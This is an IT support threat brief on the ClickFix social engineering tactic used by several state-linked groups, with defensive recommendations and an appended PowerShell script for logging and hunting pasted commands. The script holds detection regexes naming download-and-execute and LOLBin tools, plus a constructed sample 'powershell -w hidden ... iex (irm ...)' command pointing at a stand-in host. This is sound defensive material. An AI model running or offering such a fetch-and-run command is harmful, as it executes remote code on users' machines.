THREAT BRIEF (HIGH): IT Support Threat Brief April 2025
Apr 24, 2025
What is the situation?
We are pleased to provide the following IT Support Threat Brief for April 2025.
Multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia have been observed leveraging the increasingly prevalent social engineering tactic known as ClickFix to deploy malware over a three-month period from late 2024 through the beginning of 2025.
ClickFix is a social engineering tactic in which malicious websites impersonate legitimate software or document-sharing platforms. Targets are lured to these sites through phishing or malvertising and are then presented with fake error messages claiming that a document or download has failed, that the user must complete a CAPTCHA verification, or that the user needs to register their device. The "fix" the page offers is to copy a command from the page and paste it into the Windows Run dialog or a terminal; that command, typically PowerShell, is what downloads and executes the malware.
Security researchers observed the technique used in espionage campaigns by North Korea's Kimsuky, Iran's MuddyWater, and the Russian threat actors APT28 and UNK_RemoteRogue. As these actors find success with it, other groups are likely to adopt and adapt the tactic.
What are we doing?
What should I do?
Organizations should implement several protective measures to guard against ClickFix and similar social engineering techniques.
- Train users to recognize the ClickFix technique. Emphasize that no legitimate website, CAPTCHA or software update will ever ask a user to copy a command and paste it into the Run dialog or a terminal; a page that does so should be reported, not followed.
- Harden PowerShell. Enforce Constrained Language Mode through an application-control policy (WDAC or AppLocker) so that unsigned, pasted scripts cannot reach .NET or COM; setting it only through the __PSLockdownPolicy environment variable is trivially bypassed and is not a security boundary. Enable script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) so that a pasted command is recorded as it actually executes, decoded even when the page supplied it encoded or obfuscated, and forward those events to your SIEM.
- Implement robust email filtering to identify and block phishing attempts before they reach users. Because ClickFix lures also arrive through malvertising, which email filtering never sees, pair this with web filtering or an ad blocker in the browser.
- Limit administrative privileges so that a command pasted by a standard user cannot establish system-wide persistence or disable security tooling; this reduces the impact of a successful attack.
- Deploy endpoint detection and response (EDR) and alert on the execution chain ClickFix produces: explorer.exe (the Run dialog's parent) spawning powershell.exe, mshta.exe or cmd.exe with a hidden-window, encoded or download-and-execute command line shortly after browser activity.
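The PowerShell hardening and hunting steps above, as an added example that is not part of the original brief and not PDI's or Fizen's tooling: it turns on script block logging locally, defines a small set of indicators that pasted ClickFix commands tend to share, and checks both the resulting 4104 events and the current user's Win+R history (the RunMRU registry key) against them. The function names, the regex list and the sample command line are this example's own choices; the sample is constructed and points at a reserved .invalid host.

```powershell
# Added example, not part of the Fizen/PDI brief. Function names, the indicator
# regexes and the sample command line below are this example's own choices.
# Run Enable-PSScriptBlockLogging from an elevated session; the other functions
# work as a standard user.

function Enable-PSScriptBlockLogging {
    # Local equivalent of the GPO "Turn on PowerShell Script Block Logging".
    # Resulting events: Microsoft-Windows-PowerShell/Operational, Event ID 4104.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
    Get-ItemProperty -Path $key | Select-Object EnableScriptBlockLogging
}

# Indicators typical of a pasted ClickFix command: a hidden window, an encoded or
# download-and-execute payload, a LOLBin, or the lure text the page tells the
# victim to ignore ("I am not a robot", a fake Verification ID, a check-mark glyph).
$script:ClickFixPatterns = @(
    '(?i)-w(indowstyle)?\s+h(idden)?\b'
    '(?i)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}'
    '(?i)\b(iex|invoke-expression)\b'
    '(?i)\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b'
    '(?i)\b(mshta|bitsadmin|certutil|curl)(\.exe)?\b'
    '(?i)(i am not a robot|verify you are human|captcha|verification id)'
    '[\u2705\u2714]'
)

function Test-ClickFixIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Returns every pattern that matched, so the analyst sees why a line was flagged.
    $hits = @(foreach ($p in $script:ClickFixPatterns) { if ($CommandLine -match $p) { $p } })
    [pscustomobject]@{
        Suspicious  = ($hits.Count -gt 0)
        Matches     = $hits
        CommandLine = $CommandLine
    }
}

function Get-SuspiciousPSScriptBlocks {
    param([int]$MaxEvents = 1000)
    # 4104 event properties: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path.
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $r = Test-ClickFixIndicators -CommandLine ([string]$_.Properties[2].Value)
            if ($r.Suspicious) {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    UserSid     = $_.UserId
                    Matched     = ($r.Matches -join ' | ')
                    ScriptBlock = $r.CommandLine
                }
            }
        }
}

function Get-RunDialogHistory {
    # Win+R keeps what the user typed or pasted under RunMRU; each value ends in "\1".
    # For other profiles, read HKU:\<SID>\... or load that user's NTUSER.DAT instead.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return }
    $mru = Get-ItemProperty -Path $key
    if (-not $mru.MRUList) { return }
    foreach ($slot in $mru.MRUList.ToCharArray()) {   # first character = most recent
        $name = [string]$slot
        $cmd  = ([string]$mru.$name) -replace '\\1$', ''
        $r    = Test-ClickFixIndicators -CommandLine $cmd
        [pscustomobject]@{ Slot = $name; Suspicious = $r.Suspicious; Command = $cmd }
    }
}

# Constructed sample of a ClickFix "fix" (not a real campaign artefact; the host
# uses the reserved .invalid TLD), so the matcher can be exercised offline.
$sample = 'powershell -w hidden -c "iex (irm https://verify.example.invalid/c)" # I am not a robot - Verification ID: 4471'
Test-ClickFixIndicators -CommandLine $sample | Format-List
```

Constrained Language Mode is deliberately not set by this script: the durable way to enforce it is a WDAC or AppLocker policy, and the __PSLockdownPolicy environment variable is not a security boundary. The regex list is a starting point rather than a signature feed; tune it against your own 4104 baseline before alerting on it, and run the RunMRU check from a triage script rather than expecting users to do it themselves.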
Fizen Technology
Have questions? Contact us if you have technology questions for your business. We are here to help you with your IT needs, so you can focus on your business. We are grateful to PDI Security and Network Solutions for their assistance in gathering the information in this brief.